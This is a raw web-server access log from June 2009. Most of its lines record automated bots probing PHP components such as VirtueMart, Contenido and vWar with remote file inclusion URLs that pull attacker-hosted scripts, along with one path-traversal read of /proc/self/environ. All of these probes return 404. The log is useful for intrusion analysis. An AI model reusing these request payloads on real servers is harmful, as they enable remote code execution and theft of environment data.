66.128.53.115 - - [12/Jun/2009:02:25:13 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:13 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:16 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:16 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:25:16 -0400] "GET /images/_notes/nav04_conven_over.jpg.mno HTTP/1.1" 200 258 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:25:17 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:17 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:17 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:17 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:19 -0400] "GET /logs/access_log.Q109052800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:19 -0400] "GET /logs/access_log.Q109052800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:20 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:20 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:20 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:20 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:20 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:20 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:20 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:21 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:21 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:23 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:24 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:24 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:25:27 -0400] "GET /images/_notes/circle_about_over.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:25:36 -0400] "GET /images/_notes/nav04_contact_off.jpg.mno HTTP/1.1" 200 259 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:25:40 -0400] "GET /logs/access_log.Q109050300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:40 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:41 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:42 -0400] "GET /logs/access_log.Q109050300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:43 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:43 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:45 -0400] "GET /logs/access_log.Q109052800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:45 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:45 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:25:46 -0400] "GET /images/_notes/download_RCM_info.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:25:48 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:25:56 -0400] "GET /images/_notes/download_catalogs.jpg.mno HTTP/1.1" 200 185 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:25:57 -0400] "GET /logs/access_log.Q109050300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:57 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:25:57 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
217.125.38.117 - - [12/Jun/2009:02:26:00 -0400] "GET /logs/access_log.Q109052200%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
66.128.53.115 - - [12/Jun/2009:02:26:00 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:26:01 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:26:01 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:26:02 -0400] "GET /logs/access_log.Q109060800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:26:05 -0400] "GET /images/_notes/circle_log_in_off.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:26:15 -0400] "GET /images/_notes/download_order_sm.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:26:25 -0400] "GET /images/_notes/nav_store_fav_orng.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:26:26 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:26:27 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
209.59.12.99 - - [12/Jun/2009:02:26:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.128.53.115 - - [12/Jun/2009:02:26:27 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:26:28 -0400] "GET /logs/access_log.Q109060800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:26:28 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:26:29 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:26:30 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:26:30 -0400] "GET /logs/access_log.Q109060800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:26:34 -0400] "GET /images/_notes/home_welcome_bkgrd.gif.mno HTTP/1.1" 200 249 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
116.125.126.72 - - [12/Jun/2009:02:26:35 -0400] "GET /logs/index.php?arquivo=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:02:26:35 -0400] "GET /logs/access_log.Q109053100/index.php?arquivo=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:02:26:35 -0400] "GET /index.php?arquivo=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
217.125.38.117 - - [12/Jun/2009:02:26:35 -0400] "GET /logs/access_log.Q109052400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:02:26:35 -0400] "GET /logs/error_log.Q109051400/index.php?arquivo=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:26:44 -0400] "GET /images/_notes/nav04_download_off.jpg.mno HTTP/1.1" 200 259 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:26:47 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:26:47 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:26:48 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:26:53 -0400] "GET /images/_notes/home_shopping_over.jpg.mno HTTP/1.1" 200 252 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:26:56 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:26:57 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:26:59 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:26:59 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:27:00 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:27:01 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:27:03 -0400] "GET /images/_notes/contact_email_over.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.22.170 - - [12/Jun/2009:02:26:37 -0400] "GET /logs/error_log.Q109061000 HTTP/1.0" 200 2143781 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.54 - - [12/Jun/2009:02:27:13 -0400] "GET /images/_notes/contact_phone_over.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.28.145.13 - - [12/Jun/2009:02:27:14 -0400] "GET /logs/error_log.Q109041400/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.806"
193.28.145.13 - - [12/Jun/2009:02:27:14 -0400] "GET /index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.806"
193.28.145.13 - - [12/Jun/2009:02:27:15 -0400] "GET /logs/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.806"
66.249.71.54 - - [12/Jun/2009:02:27:22 -0400] "GET /images/_notes/download_credit_lg.jpg.mno HTTP/1.1" 200 258 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.111.0.66 - - [12/Jun/2009:02:27:24 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:02:27:25 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:02:27:25 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.128.53.115 - - [12/Jun/2009:02:27:29 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:27:29 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:27:30 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
74.6.22.170 - - [12/Jun/2009:02:26:55 -0400] "GET /logs/access_log.Q109060200 HTTP/1.0" 200 4890211 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.128.53.115 - - [12/Jun/2009:02:27:33 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:27:35 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:27:35 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:27:39 -0400] "GET /images/_notes/nav_store_expr_grn.jpg.mno HTTP/1.1" 200 246 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.128.135.52 - - [12/Jun/2009:02:27:39 -0400] "GET /logs/error_log.Q109041400/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
62.128.135.52 - - [12/Jun/2009:02:27:39 -0400] "GET /index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
62.128.135.52 - - [12/Jun/2009:02:27:40 -0400] "GET /logs/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
66.128.53.115 - - [12/Jun/2009:02:27:40 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:27:41 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:27:41 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
89.223.3.98 - - [12/Jun/2009:02:27:41 -0400] "GET /logs/access_log.Q109052900%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:27:41 -0400] "GET /images/_notes/download_cat_BBF04.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:27:41 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:27:43 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:27:47 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
89.223.3.98 - - [12/Jun/2009:02:27:47 -0400] "GET /logs/access_log.Q109053000%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:27:52 -0400] "GET /images/_notes/download_bonescrew.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:27:58 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:28:01 -0400] "GET /images/_notes/circle_log_in_over.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:28:05 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:28:05 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:28:10 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:28:10 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:28:11 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:28:11 -0400] "GET /images/_notes/circle_get_it_over.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:28:16 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
62.128.135.52 - - [12/Jun/2009:02:28:18 -0400] "GET /logs/access_log.Q109010700/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
74.6.22.170 - - [12/Jun/2009:02:28:09 -0400] "GET /logs/access_log.Q109061200 HTTP/1.0" 200 323047 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.54 - - [12/Jun/2009:02:28:20 -0400] "GET /images/_notes/nav04_products_off.jpg.mno HTTP/1.1" 200 259 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:28:22 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
74.6.22.170 - - [12/Jun/2009:02:28:22 -0400] "GET /logs/access_log.Q109060800 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.128.53.115 - - [12/Jun/2009:02:28:22 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:28:23 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:28:28 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
